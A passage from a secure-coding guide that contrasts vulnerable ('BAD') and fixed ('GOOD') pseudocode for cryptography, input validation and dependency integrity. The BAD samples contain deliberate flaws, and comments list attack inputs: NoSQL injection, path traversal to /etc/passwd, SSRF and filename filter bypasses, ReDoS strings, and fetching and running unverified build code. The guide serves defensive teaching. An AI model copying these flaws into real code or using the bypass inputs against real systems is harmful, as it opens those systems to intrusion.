AES.new(ENCRYPTION_KEY, mode=GCM) + RETURN cipher.encrypt(data) +END FUNCTION + +// Problems: +// - Keys in version control are exposed forever +// - Cannot rotate keys without code changes +// - All environments share same key + +// ======================================== +// GOOD: External key management +// ======================================== +FUNCTION get_encryption_key(): + // Option 1: Environment variable + key = environment.get("ENCRYPTION_KEY") + + IF key IS NULL: + THROW Error("ENCRYPTION_KEY environment variable required") + END IF + + // Validate key length for AES-256 + key_bytes = base64_decode(key) + IF key_bytes.length != 32: + THROW Error("ENCRYPTION_KEY must be 256 bits") + END IF + + RETURN key_bytes +END FUNCTION + +FUNCTION encrypt_user_data(data): + key = get_encryption_key() + nonce = crypto.secure_random_bytes(12) + cipher = AES_GCM.new(key, nonce) + ciphertext, tag = cipher.encrypt_and_digest(data) + RETURN nonce + tag + ciphertext +END FUNCTION + +// Better: Use a secret manager for production +FUNCTION get_encryption_key_from_manager(): + TRY: + // AWS Secrets Manager, HashiCorp Vault, Azure Key Vault, etc. + secret = secret_manager.get_secret("encryption-key") + RETURN base64_decode(secret.value) + CATCH Error as e: + log.error("Failed to retrieve encryption key", {error: e.message}) + THROW Error("Encryption key unavailable") + END TRY +END FUNCTION +``` + +### 5.3 ECB Mode Usage + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: ECB mode reveals patterns in data +// ======================================== +FUNCTION encrypt_ecb(plaintext, key): + // Vulnerable: ECB encrypts identical blocks identically + cipher = AES.new(key, mode=ECB) + RETURN cipher.encrypt(pad(plaintext)) +END FUNCTION + +// Problem demonstration: +// Encrypting an image with ECB mode preserves visual patterns +// because identical 16-byte blocks produce identical ciphertext +// This reveals structure of the original data! + +// Identical plaintexts produce identical ciphertexts: +// plaintext_block_1 = "AAAAAAAAAAAAAAAA" +// plaintext_block_2 = "AAAAAAAAAAAAAAAA" +// ciphertext_1 == ciphertext_2 // Information leaked! + +// ======================================== +// GOOD: Use authenticated encryption modes +// ======================================== +FUNCTION encrypt_gcm(plaintext, key): + // GCM mode: Each encryption is unique even for same plaintext + nonce = crypto.secure_random_bytes(12) // 96-bit nonce for GCM + + cipher = AES_GCM.new(key, nonce) + ciphertext, auth_tag = cipher.encrypt_and_digest(plaintext) + + // Return nonce + tag + ciphertext (all needed for decryption) + RETURN nonce + auth_tag + ciphertext +END FUNCTION + +FUNCTION decrypt_gcm(encrypted_data, key): + // Extract components + nonce = encrypted_data[0:12] + auth_tag = encrypted_data[12:28] + ciphertext = encrypted_data[28:] + + cipher = AES_GCM.new(key, nonce) + + TRY: + plaintext = cipher.decrypt_and_verify(ciphertext, auth_tag) + RETURN plaintext + CATCH AuthenticationError: + // Tampering detected! + log.warning("Decryption failed: authentication tag mismatch") + THROW Error("Data integrity check failed") + END TRY +END FUNCTION + +// Alternative: CBC mode (if GCM not available) +FUNCTION encrypt_cbc(plaintext, key): + // CBC requires random IV for each encryption + iv = crypto.secure_random_bytes(16) + + cipher = AES_CBC.new(key, iv) + padded = pkcs7_pad(plaintext, block_size=16) + ciphertext = cipher.encrypt(padded) + + // Must also add HMAC for authentication (encrypt-then-MAC) + mac = hmac_sha256(key, iv + ciphertext) + + RETURN iv + ciphertext + mac +END FUNCTION +``` + +### 5.4 Missing or Weak IVs/Nonces + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Predictable or reused IVs/nonces +// ======================================== +FUNCTION encrypt_static_iv(plaintext, key): + // Vulnerable: Static IV - identical plaintexts have identical ciphertexts + iv = bytes([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]) + cipher = AES_CBC.new(key, iv) + RETURN cipher.encrypt(pad(plaintext)) +END FUNCTION + +FUNCTION encrypt_counter_nonce(plaintext, key, message_counter): + // Vulnerable: Predictable counter-based nonce + nonce = int_to_bytes(message_counter, length=12) + cipher = AES_GCM.new(key, nonce) + RETURN cipher.encrypt(plaintext) +END FUNCTION + +FUNCTION encrypt_truncated_nonce(plaintext, key): + // Vulnerable: Nonce too short + nonce = crypto.secure_random_bytes(4) // Only 32 bits! + cipher = AES_GCM.new(key, nonce) + RETURN cipher.encrypt(plaintext) +END FUNCTION + +// Problems: +// - Static IV: Same plaintext → same ciphertext (pattern leakage) +// - Predictable nonce: Allows chosen-plaintext attacks +// - Short nonce: Birthday collision after ~2^16 messages +// - GCM with repeated nonce: CATASTROPHIC - authentication key recovered! + +// ======================================== +// GOOD: Cryptographically random IVs/nonces +// ======================================== +FUNCTION encrypt_with_random_iv(plaintext, key): + // Generate random IV for each encryption + iv = crypto.secure_random_bytes(16) // 128 bits for AES-CBC + + cipher = AES_CBC.new(key, iv) + padded = pkcs7_pad(plaintext, block_size=16) + ciphertext = cipher.encrypt(padded) + + // Prepend IV (it's not secret, just must be unique) + RETURN iv + ciphertext +END FUNCTION + +FUNCTION encrypt_with_random_nonce(plaintext, key): + // Generate random nonce for each encryption + nonce = crypto.secure_random_bytes(12) // 96 bits for AES-GCM + + cipher = AES_GCM.new(key, nonce) + ciphertext, tag = cipher.encrypt_and_digest(plaintext) + + RETURN nonce + tag + ciphertext +END FUNCTION + +// For high-volume encryption: Use key+nonce management +FUNCTION encrypt_with_derived_nonce(plaintext, key, message_id): + // Derive unique nonce from random key-specific prefix + message ID + // This prevents nonce reuse across different encryption contexts + + nonce_key = derive_key(key, "nonce-derivation") + nonce = hmac_sha256(nonce_key, message_id)[0:12] + + cipher = AES_GCM.new(key, nonce) + ciphertext, tag = cipher.encrypt_and_digest(plaintext) + + RETURN message_id + tag + ciphertext // Include message_id for decryption +END FUNCTION +``` + +### 5.5 Rolling Your Own Crypto + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Custom cryptographic implementations +// ======================================== +FUNCTION my_encrypt(plaintext, key): + // Vulnerable: XOR "encryption" is trivially broken + result = "" + FOR i = 0 TO plaintext.length - 1: + result += char(plaintext[i] XOR key[i % key.length]) + END FOR + RETURN result +END FUNCTION + +FUNCTION my_hash(data): + // Vulnerable: Custom hash is not collision-resistant + result = 0 + FOR byte IN data: + result = (result * 31 + byte) % 2147483647 + END FOR + RETURN result +END FUNCTION + +FUNCTION my_random(seed): + // Vulnerable: Linear congruential generator + RETURN (seed * 1103515245 + 12345) % (2^31) +END FUNCTION + +// Problems: +// - XOR cipher: Trivially broken with known-plaintext +// - Custom hash: Collisions easily found +// - LCG random: Completely predictable sequence + +// ======================================== +// GOOD: Use established cryptographic libraries +// ======================================== +FUNCTION encrypt_properly(plaintext, key): + // Use vetted library implementations + // Python: cryptography library + // Node.js: crypto module + // Java: javax.crypto + // Go: crypto/* packages + + // AES-GCM from standard library + nonce = crypto.secure_random_bytes(12) + cipher = crypto.createCipheriv("aes-256-gcm", key, nonce) + + ciphertext = cipher.update(plaintext) + cipher.final() + auth_tag = cipher.getAuthTag() + + RETURN nonce + auth_tag + ciphertext +END FUNCTION + +FUNCTION hash_properly(data): + // Use standard library hash functions + RETURN crypto.sha256(data) +END FUNCTION + +FUNCTION random_properly(num_bytes): + // Use OS-provided cryptographic randomness + RETURN crypto.secure_random_bytes(num_bytes) +END FUNCTION + +// Rule: Never implement cryptographic primitives yourself +// - Encryption: Use library AES-GCM, ChaCha20-Poly1305 +// - Hashing: Use library SHA-256, SHA-3, BLAKE2 +// - Signatures: Use library Ed25519, ECDSA +// - Random: Use library secrets module or os.urandom +``` + +### 5.6 Insecure Random Number Generation + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Non-cryptographic RNG for security +// ======================================== +FUNCTION generate_session_id_weak(): + // Vulnerable: Math.random() / random.random() is predictable + RETURN random.randint(0, 999999999) +END FUNCTION + +FUNCTION generate_token_weak(): + // Vulnerable: Using random module for security tokens + chars = "abcdefghijklmnopqrstuvwxyz0123456789" + token = "" + FOR i = 0 TO 32: + token += chars[random.randint(0, chars.length - 1)] + END FOR + RETURN token +END FUNCTION + +FUNCTION generate_key_weak(): + // Vulnerable: Time-based seeding + random.seed(current_timestamp()) + key = random.randbytes(32) + RETURN key +END FUNCTION + +// Problems: +// - Math.random(): Uses predictable PRNG (Mersenne Twister) +// - Time seed: Attacker can guess seed from approximate time +// - Internal state: Can be recovered from ~624 outputs + +// ======================================== +// GOOD: Cryptographically secure randomness +// ======================================== +FUNCTION generate_session_id_secure(): + // Use cryptographically secure random + RETURN secrets.token_urlsafe(32) // 256 bits of entropy +END FUNCTION + +FUNCTION generate_token_secure(): + // Use secrets module (Python) or crypto.randomBytes (Node) + RETURN secrets.token_hex(32) // 256 bits as hex string +END FUNCTION + +FUNCTION generate_key_secure(): + // Use OS entropy source + RETURN os.urandom(32) // 256 bits from /dev/urandom or equivalent +END FUNCTION + +FUNCTION generate_password_secure(length): + // Secure password generation + alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*" + password = "" + FOR i = 0 TO length - 1: + password += alphabet[secrets.randbelow(alphabet.length)] + END FOR + RETURN password +END FUNCTION + +// Language-specific secure random: +// Python: secrets module, os.urandom +// Node.js: crypto.randomBytes, crypto.randomUUID +// Java: SecureRandom +// Go: crypto/rand +// Ruby: SecureRandom +// PHP: random_bytes, random_int +``` + +### 5.7 Improper Key Derivation + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Weak key derivation methods +// ======================================== +FUNCTION derive_key_weak(password): + // Vulnerable: Direct hash of password + RETURN sha256(password) +END FUNCTION + +FUNCTION derive_key_truncated(password): + // Vulnerable: Password truncation + RETURN password.bytes()[0:32] // Loses entropy! +END FUNCTION + +FUNCTION derive_key_md5(password, salt): + // Vulnerable: MD5 with low iteration count + RETURN md5(salt + password) +END FUNCTION + +FUNCTION derive_key_fast(password, salt): + // Vulnerable: Single SHA iteration (too fast to brute-force resist) + RETURN sha256(salt + password) +END FUNCTION + +// Problems: +// - Direct hash: No salt, no iterations, vulnerable to rainbow tables +// - Truncation: Reduces entropy, predictable patterns +// - Fast hash: GPU can compute billions per second + +// ======================================== +// GOOD: Proper key derivation functions +// ======================================== +FUNCTION derive_key_pbkdf2(password, salt): + // PBKDF2 with high iteration count + IF salt IS NULL: + salt = crypto.secure_random_bytes(32) + END IF + + key = pbkdf2_hmac( + hash_name="sha256", + password=password.encode(), + salt=salt, + iterations=600000, // OWASP recommends 600,000+ for SHA-256 + key_length=32 + ) + RETURN {key: key, salt: salt} +END FUNCTION + +FUNCTION derive_key_argon2(password, salt): + // Argon2id - memory-hard, recommended for passwords + IF salt IS NULL: + salt = crypto.secure_random_bytes(16) + END IF + + key = argon2id.hash( + password=password, + salt=salt, + time_cost=3, // Iterations + memory_cost=65536, // 64MB memory + parallelism=4, // 4 threads + hash_len=32 // Output length + ) + RETURN {key: key, salt: salt} +END FUNCTION + +FUNCTION derive_key_scrypt(password, salt): + // scrypt - memory-hard alternative + IF salt IS NULL: + salt = crypto.secure_random_bytes(32) + END IF + + key = scrypt( + password=password.encode(), + salt=salt, + n=2^17, // CPU/memory cost (131072) + r=8, // Block size + p=1, // Parallelism + key_length=32 + ) + RETURN {key: key, salt: salt} +END FUNCTION + +// For deriving multiple keys from one password +FUNCTION derive_multiple_keys(password, salt): + // Use HKDF to derive multiple keys from master key + master_key = derive_key_argon2(password, salt).key + + encryption_key = hkdf_expand( + master_key, + info="encryption", + length=32 + ) + + mac_key = hkdf_expand( + master_key, + info="mac", + length=32 + ) + + RETURN { + encryption_key: encryption_key, + mac_key: mac_key + } +END FUNCTION +``` + +--- + +## 6. Input Validation + +**CWE References:** CWE-20 (Improper Input Validation), CWE-1284 (Improper Validation of Specified Quantity in Input), CWE-1333 (Inefficient Regular Expression Complexity), CWE-22 (Path Traversal), CWE-180 (Incorrect Behavior Order: Validate Before Canonicalize) +**Severity:** High | **Related:** [[Input-Validation]] + +> **Risk:** Input validation failures are a foundational vulnerability enabling most other attack classes. AI-generated code frequently relies solely on client-side validation (trivially bypassed) or omits validation entirely. Missing length limits enable DoS attacks, improper type checking allows type confusion attacks, and ReDoS patterns can freeze services. All user input must be validated on the server with type, length, format, and range constraints. + +### 6.1 Missing Server-Side Validation (Client-Only) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Client-side only validation +// ======================================== +// Frontend JavaScript +FUNCTION validate_form_client_only(): + email = document.getElementById("email").value + age = document.getElementById("age").value + + IF NOT email.includes("@"): + show_error("Invalid email") + RETURN FALSE + END IF + + IF age < 0 OR age > 150: + show_error("Invalid age") + RETURN FALSE + END IF + + // Form submits if client-side validation passes + form.submit() +END FUNCTION + +// Backend - NO validation! +FUNCTION create_user(request): + // Vulnerable: Trusts client-side validation completely + email = request.body.email + age = request.body.age + + database.insert("users", {email: email, age: age}) + RETURN {success: TRUE} +END FUNCTION + +// Attack: Attacker bypasses JavaScript with direct HTTP request +// curl -X POST /api/users -d '{"email":"not-an-email","age":-999}' +// Result: Invalid data stored in database + +// ======================================== +// GOOD: Server-side validation (client-side is UX only) +// ======================================== +// Backend - validates everything +FUNCTION create_user(request): + // Validate all input server-side + validation_errors = [] + + // Email validation + email = request.body.email + IF typeof(email) != "string": + validation_errors.append("Email must be a string") + ELSE IF NOT regex.match("^[^@]+@[^@]+\.[^@]+$", email): + validation_errors.append("Invalid email format") + ELSE IF email.length > 254: + validation_errors.append("Email too long") + END IF + + // Age validation + age = request.body.age + IF typeof(age) != "number" OR NOT is_integer(age): + validation_errors.append("Age must be an integer") + ELSE IF age < 0 OR age > 150: + validation_errors.append("Age must be between 0 and 150") + END IF + + IF validation_errors.length > 0: + RETURN {success: FALSE, errors: validation_errors} + END IF + + // Safe to process validated data + database.insert("users", {email: email, age: age}) + RETURN {success: TRUE} +END FUNCTION + +// Client-side validation is still useful for UX (immediate feedback) +// but NEVER rely on it for security +``` + +### 6.2 Improper Type Checking + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Missing or weak type validation +// ======================================== +FUNCTION process_payment_weak(request): + amount = request.body.amount + quantity = request.body.quantity + + // Vulnerable: No type checking + total = amount * quantity + + // What if amount = "100" (string)? JavaScript: "100" * 2 = 200 (coerced) + // What if amount = [100]? Some languages coerce arrays unexpectedly + // What if quantity = {"$gt": 0}? NoSQL injection possible + + charge_card(user, total) +END FUNCTION + +FUNCTION get_user_weak(request): + user_id = request.params.id + + // Vulnerable: ID could be array, object, or unexpected type + // MongoDB: ?id[$ne]=null returns all users! + RETURN database.find_one({id: user_id}) +END FUNCTION + +FUNCTION calculate_discount_weak(price, discount_percent): + // Vulnerable: No validation of numeric types + // discount_percent = "50" → string concatenation in some languages + // discount_percent = NaN → NaN propagates through calculations + final_price = price - (price * discount_percent / 100) + RETURN final_price +END FUNCTION + +// ======================================== +// GOOD: Strict type validation +// ======================================== +FUNCTION process_payment_safe(request): + // Validate amount + amount = request.body.amount + IF typeof(amount) != "number": + THROW ValidationError("Amount must be a number") + END IF + IF NOT is_finite(amount) OR is_nan(amount): + THROW ValidationError("Amount must be a valid number") + END IF + IF amount <= 0: + THROW ValidationError("Amount must be positive") + END IF + + // Validate quantity + quantity = request.body.quantity + IF typeof(quantity) != "number" OR NOT is_integer(quantity): + THROW ValidationError("Quantity must be an integer") + END IF + IF quantity <= 0 OR quantity > 1000: + THROW ValidationError("Quantity must be between 1 and 1000") + END IF + + // Safe to calculate + total = amount * quantity + + // Additional: Prevent floating point issues with currency + total_cents = round(total * 100) // Work in cents + charge_card(user, total_cents) +END FUNCTION + +FUNCTION get_user_safe(request): + user_id = request.params.id + + // Strict type checking + IF typeof(user_id) != "string": + THROW ValidationError("User ID must be a string") + END IF + + // Format validation (e.g., UUID) + IF NOT is_valid_uuid(user_id): + THROW ValidationError("Invalid user ID format") + END IF + + RETURN database.find_one({id: user_id}) +END FUNCTION + +// Type coercion helper with explicit validation +FUNCTION parse_integer_strict(value, min, max): + IF typeof(value) == "number": + IF NOT is_integer(value): + THROW ValidationError("Expected integer, got float") + END IF + result = value + ELSE IF typeof(value) == "string": + IF NOT regex.match("^-?[0-9]+$", value): + THROW ValidationError("Invalid integer format") + END IF + result = parse_int(value) + ELSE: + THROW ValidationError("Expected number or numeric string") + END IF + + IF result < min OR result > max: + THROW ValidationError("Value out of range: " + min + " to " + max) + END IF + + RETURN result +END FUNCTION +``` + +### 6.3 Missing Length Limits + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: No length limits on input +// ======================================== +FUNCTION create_post_unlimited(request): + title = request.body.title + content = request.body.content + + // Vulnerable: No length limits + // Attacker sends 1GB title, exhausts memory/storage + database.insert("posts", {title: title, content: content}) +END FUNCTION + +FUNCTION search_unlimited(request): + query = request.params.q + + // Vulnerable: Long query strings can DoS search systems + // Also enables ReDoS if query is used in regex + results = database.search(query) + RETURN results +END FUNCTION + +FUNCTION process_file_unlimited(request): + file_content = request.body.file + + // Vulnerable: No file size limit + // Attacker uploads 10GB file, exhausts disk/memory + save_file(file_content) +END FUNCTION + +// Real-world DoS: JSON payload with deeply nested objects +// {"a":{"a":{"a":{"a":...}}}} // 1000 levels deep +// Can crash parsers or exhaust stack space + +// ======================================== +// GOOD: Enforce length limits on all inputs +// ======================================== +CONSTANT MAX_TITLE_LENGTH = 200 +CONSTANT MAX_CONTENT_LENGTH = 50000 +CONSTANT MAX_SEARCH_QUERY = 500 +CONSTANT MAX_FILE_SIZE = 10 * 1024 * 1024 // 10MB +CONSTANT MAX_JSON_DEPTH = 20 + +FUNCTION create_post_limited(request): + title = request.body.title + content = request.body.content + + // Validate title length + IF typeof(title) != "string": + THROW ValidationError("Title must be a string") + END IF + IF title.length == 0: + THROW ValidationError("Title is required") + END IF + IF title.length > MAX_TITLE_LENGTH: + THROW ValidationError("Title exceeds " + MAX_TITLE_LENGTH + " characters") + END IF + + // Validate content length + IF typeof(content) != "string": + THROW ValidationError("Content must be a string") + END IF + IF content.length > MAX_CONTENT_LENGTH: + THROW ValidationError("Content exceeds " + MAX_CONTENT_LENGTH + " characters") + END IF + + database.insert("posts", {title: title, content: content}) +END FUNCTION + +FUNCTION search_limited(request): + query = request.params.q + + IF typeof(query) != "string": + THROW ValidationError("Query must be a string") + END IF + IF query.length > MAX_SEARCH_QUERY: + THROW ValidationError("Search query too long") + END IF + IF query.length < 2: + THROW ValidationError("Search query too short") + END IF + + results = database.search(query) + RETURN results +END FUNCTION + +// Configure request body limits at framework level +FUNCTION configure_server(): + server.set_body_limit(MAX_FILE_SIZE) + server.set_json_depth_limit(MAX_JSON_DEPTH) + server.set_parameter_limit(1000) // Max form fields + server.set_header_size_limit(8192) // 8KB header limit +END FUNCTION + +// Array length limits +FUNCTION process_batch_request(request): + items = request.body.items + + IF NOT is_array(items): + THROW ValidationError("Items must be an array") + END IF + IF items.length > 100: + THROW ValidationError("Maximum 100 items per batch") + END IF + + FOR item IN items: + process_single_item(item) + END FOR +END FUNCTION +``` + +### 6.4 Regex Denial of Service (ReDoS) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Vulnerable regex patterns +// ======================================== +FUNCTION validate_email_redos(email): + // Vulnerable: Catastrophic backtracking on malformed input + // Pattern with nested quantifiers + pattern = "^([a-zA-Z0-9]+)+@[a-zA-Z0-9]+\.[a-zA-Z]+$" + + // Attack input: "aaaaaaaaaaaaaaaaaaaaaaaaaaaa!" + // Regex engine tries exponential combinations before failing + RETURN regex.match(pattern, email) +END FUNCTION + +FUNCTION validate_url_redos(url): + // Vulnerable: Multiple overlapping groups + pattern = "^(https?://)?(www\.)?([a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}(/.*)*$" + + // Attack input: "http://aaaaaaaaaaaaaaaaaaaaaaaa" + RETURN regex.match(pattern, url) +END FUNCTION + +FUNCTION search_with_regex(user_pattern, content): + // Vulnerable: User-controlled regex pattern + // Attacker provides: "(a+)+$" with input "aaaaaaaaaaaaaaaaaaaX" + RETURN regex.search(user_pattern, content) +END FUNCTION + +// ReDoS patterns to avoid: +// - Nested quantifiers: (a+)+, (a*)* +// - Overlapping alternatives: (a|a)+, (a|ab)+ +// - Quantified groups with repetition: (a+b+)+ + +// ======================================== +// GOOD: Safe regex patterns and practices +// ======================================== +FUNCTION validate_email_safe(email): + // First: Length check before regex + IF email.length > 254: + RETURN FALSE + END IF + + // Use atomic groups or possessive quantifiers if available + // Or use simpler, non-backtracking patterns + pattern = "^[^@\s]+@[^@\s]+\.[^@\s]+$" // Simple, no backtracking risk + + RETURN regex.match(pattern, email) +END FUNCTION + +FUNCTION validate_email_best(email): + // Best: Use a validated library + TRY: + validated = email_validator.validate(email) + RETURN TRUE + CATCH ValidationError: + RETURN FALSE + END TRY +END FUNCTION + +FUNCTION validate_url_safe(url): + // Length limit first + IF url.length > 2048: + RETURN FALSE + END IF + + // Use URL parser instead of regex + TRY: + parsed = url_parser.parse(url) + RETURN parsed.host IS NOT NULL AND parsed.protocol IN ["http:", "https:"] + CATCH ParseError: + RETURN FALSE + END TRY +END FUNCTION + +FUNCTION search_with_safe_pattern(user_input, content): + // Never use user input directly as regex + // Escape special characters if literal match needed + escaped_input = regex.escape(user_input) + + // Set timeout on regex operations + RETURN regex.search(escaped_input, content, timeout=1000) // 1 second max +END FUNCTION + +// Use RE2 or similar guaranteed-linear-time regex engine +FUNCTION search_with_re2(pattern, content): + // RE2 rejects patterns that could cause exponential backtracking + TRY: + compiled = re2.compile(pattern) + RETURN compiled.search(content) + CATCH UnsupportedPatternError: + // Pattern rejected due to backtracking risk + THROW ValidationError("Invalid search pattern") + END TRY +END FUNCTION + +// Safe pattern testing +FUNCTION is_safe_regex(pattern): + // Detect common ReDoS patterns + dangerous_patterns = [ + "\\(.+\\)+\\+", // (x+)+ + "\\(.+\\)\\*\\+", // (x*)+ + "\\(.+\\)+\\*", // (x+)* + "\\(.+\\|.+\\)+" // (a|b)+ + ] + + FOR dangerous IN dangerous_patterns: + IF regex.search(dangerous, pattern): + RETURN FALSE + END IF + END FOR + + RETURN TRUE +END FUNCTION +``` + +### 6.5 Accepting and Processing Untrusted Data + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Trusting external data sources +// ======================================== +FUNCTION process_webhook_unsafe(request): + // Vulnerable: No signature verification + data = json.parse(request.body) + + // Attacker can spoof webhook requests + IF data.event == "payment_completed": + mark_order_paid(data.order_id) // Dangerous! + END IF +END FUNCTION + +FUNCTION fetch_and_process_unsafe(url): + // Vulnerable: Processing arbitrary external content + response = http.get(url) + data = json.parse(response.body) + + // No validation of response structure + database.insert("external_data", data) +END FUNCTION + +FUNCTION deserialize_unsafe(serialized_data): + // Vulnerable: Pickle/eval deserialization of untrusted data + // Allows arbitrary code execution! + object = pickle.loads(serialized_data) + RETURN object +END FUNCTION + +FUNCTION process_xml_unsafe(xml_string): + // Vulnerable: XXE (XML External Entity) attack + parser = xml.create_parser() + doc = parser.parse(xml_string) + // Attacker XML: + RETURN doc +END FUNCTION + +// ======================================== +// GOOD: Validate and sanitize external data +// ======================================== +FUNCTION process_webhook_safe(request): + // Verify webhook signature + signature = request.headers.get("X-Signature") + expected = hmac_sha256(WEBHOOK_SECRET, request.raw_body) + + IF NOT constant_time_compare(signature, expected): + log.warning("Invalid webhook signature", {ip: request.ip}) + RETURN {status: 401, error: "Invalid signature"} + END IF + + // Validate payload structure + data = json.parse(request.body) + + IF NOT validate_webhook_schema(data): + RETURN {status: 400, error: "Invalid payload"} + END IF + + // Process verified and validated data + IF data.event == "payment_completed": + // Additional verification: Check with payment provider + IF verify_payment_with_provider(data.payment_id): + mark_order_paid(data.order_id) + END IF + END IF +END FUNCTION + +FUNCTION fetch_and_process_safe(url): + // Validate URL is from allowed sources + parsed_url = url_parser.parse(url) + IF parsed_url.host NOT IN ALLOWED_HOSTS: + THROW ValidationError("URL host not allowed") + END IF + + // Fetch with timeout and size limits + response = http.get(url, timeout=10, max_size=1024*1024) + + // Parse and validate structure + TRY: + data = json.parse(response.body) + CATCH JSONError: + THROW ValidationError("Invalid JSON response") + END TRY + + // Validate against expected schema + validated_data = validate_schema(data, EXPECTED_SCHEMA) + + // Sanitize before storing + sanitized = sanitize_object(validated_data) + database.insert("external_data", sanitized) +END FUNCTION + +FUNCTION deserialize_safe(data, format): + // Never use pickle/eval for untrusted data + // Use safe serialization formats + IF format == "json": + RETURN json.parse(data) + ELSE IF format == "msgpack": + RETURN msgpack.unpack(data) + ELSE: + THROW Error("Unsupported format") + END IF +END FUNCTION + +FUNCTION process_xml_safe(xml_string): + // Disable external entities and DTDs + parser = xml.create_parser( + resolve_entities=FALSE, + load_dtd=FALSE, + no_network=TRUE + ) + + TRY: + doc = parser.parse(xml_string) + RETURN doc + CATCH XMLError as e: + log.warning("XML parsing failed", {error: e.message}) + THROW ValidationError("Invalid XML") + END TRY +END FUNCTION + +// Schema validation helper +FUNCTION validate_schema(data, schema): + // Use JSON Schema or similar validation library + validator = JsonSchemaValidator(schema) + + IF NOT validator.is_valid(data): + errors = validator.get_errors() + THROW ValidationError("Schema validation failed: " + errors.join(", ")) + END IF + + RETURN data +END FUNCTION +``` + +### 6.6 Missing Canonicalization + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Validation without canonicalization +// ======================================== +FUNCTION check_path_unsafe(requested_path): + // Vulnerable: Path not canonicalized before validation + IF requested_path.starts_with("/uploads/"): + // Bypass: "../../../etc/passwd" doesn't start with /uploads/ + // But resolves to outside the directory! + RETURN read_file(requested_path) + END IF + THROW AccessDenied("Invalid path") +END FUNCTION + +FUNCTION check_url_unsafe(url): + // Vulnerable: URL manipulation bypasses check + // Blocked: "http://internal-server" + // Bypass: "http://internal-server%00.example.com" + // Bypass: "http://0x7f000001" (127.0.0.1 in hex) + // Bypass: "http://localhost" vs "http://LOCALHOST" vs "http://127.0.0.1" + + IF url.contains("internal-server"): + THROW AccessDenied("Internal URLs not allowed") + END IF + + RETURN http.get(url) +END FUNCTION + +FUNCTION validate_filename_unsafe(filename): + // Vulnerable: Unicode normalization bypass + // Blocked: "config.php" + // Bypass: "config.php" with full-width characters (config.php) + // Bypass: "config.php\x00.txt" (null byte injection) + + IF filename.ends_with(".php"): + THROW AccessDenied("PHP files not allowed") + END IF + + save_file(filename) +END FUNCTION + +FUNCTION check_html_unsafe(content): + // Vulnerable: Case-sensitive blacklist + // Blocked: " + +// Downloading without verification +FUNCTION download_dependency(url): + content = http.get(url) + write_file("lib/dependency.js", content) + // No verification that content is what we expected +END FUNCTION + +// Package install without lockfile integrity +FUNCTION install(): + run_command("npm install") // Uses ^ ranges, no integrity check +END FUNCTION + +// Build process pulling from remote without checks +FUNCTION build(): + // Downloading build tools without verification + download("https://build-tools.example.com/compiler.tar.gz") + extract("compiler.tar.gz") + execute("./compiler/build") // Running unverified code +END FUNCTION + +// ======================================== +// GOOD: Verify integrity at every step +// ======================================== + +// HTML with Subresource Integrity (SRI) + + +// Download with hash verification +FUNCTION download_verified(url, expected_hash): + content = http.get(url) + + // Calculate hash of downloaded content + actual_hash = crypto.sha384(content) + + IF actual_hash != expected_hash: + log.error("Integrity check failed", { + url: url, + expected: expected_hash, + actual: actual_hash + }) + THROW SecurityError("Downloaded file failed integrity check") + END IF + + RETURN content +END FUNCTION + +FUNCTION download_dependency(url, expected_hash): + content = download_verified(url, expected_hash) + write_file("lib/dependency.js", content) + log.info("Dependency installed with verified integrity", {url: url}) +END FUNCTION + +// Package lockfile with integrity hashes +// package-lock.json includes: +{ + "lodash": { + "version": "4.17.21", + "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz", + "integrity": "sha512-v2kDE0cyTsc..." // Verified on install + } +} + +// Strict install from lockfile +FUNCTION install_with_integrity(): + // npm ci verifies integrity hashes from lockfile + result = run_command("npm ci") + + IF NOT result.success: + THROW Error("Installation failed integrity verification") + END IF +END FUNCTION + +// Build reproducibility with verified tools +FUNCTION secure_build(): + // Pin and verify all build tool versions + tools = { + "node": {version: "20.10.0", hash: "sha256:abc123..."}, + "npm": {version: "10.2.3", hash: "sha256:def456..."}, + "compiler": {version: "1.2.3", hash: "sha256:ghi789..."} + } + + FOR tool_name, tool_spec IN tools: + // Verify tool binary integrity before use + actual_hash = hash_file(get_tool_path(tool_name)) + + IF actual_hash != tool_spec.hash: + THROW SecurityError("Build tool integrity check failed: " + tool_name) + END IF + END FOR + + // Proceed with verified tools + run_build() +END FUNCTION + +// Generate SRI hashes for your own assets +FUNCTION generate_sri_hash(file_path): + content = read_file(file_path) + hash = crypto.sha384_base64(content) + RETURN "sha384-" + hash +END FUNCTION + +FUNCTION generate_script_tag(src, file_path): + integrity = generate_sri_hash(file_path) + RETURN '' +END FUNCTION + +// Registry verification +FUNCTION verify_registry(): + // Ensure using official, signed registry + registry_config = get_registry_config() + + IF NOT registry_config.url.startswith("https://"): + THROW SecurityError("Registry must use HTTPS") + END IF + + // Verify registry certificate + IF NOT verify_certificate(registry_config.url): + THROW SecurityError("Registry certificate verification failed") + END IF + + // Check for registry signing if supported + IF registry_supports_signing(registry_config.url): + enable_signature_verification() + END IF +END FUNCTION +``` + +### 8.6 Trusting Transitive Dependencies Blindly + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Ignoring transitive dependency risks +// ======================================== + +// Your package.json has 10 direct dependencies +// But those bring in 500+ transitive dependencies +// Each is a potential attack vector + +FUNCTION show_dependency_problem(): + // You audit only direct dependencies + direct_deps = ["express", "lodash", "axios"] // 3 packages + + // Reality after npm install + all_deps = get_all_installed_packages() + print("Direct: 3, Total installed: " + all_deps.count) // 547 packages! + + // Any of those 544 transitive deps could be: + // - Abandoned and vulnerable + // - Taken over by malicious actors + // - Typosquats + // - Compromised in CI/CD +END FUNCTION + +// Event-stream incident: Dependency of dependency was compromised +// ua-parser-js incident: Popular package itself was 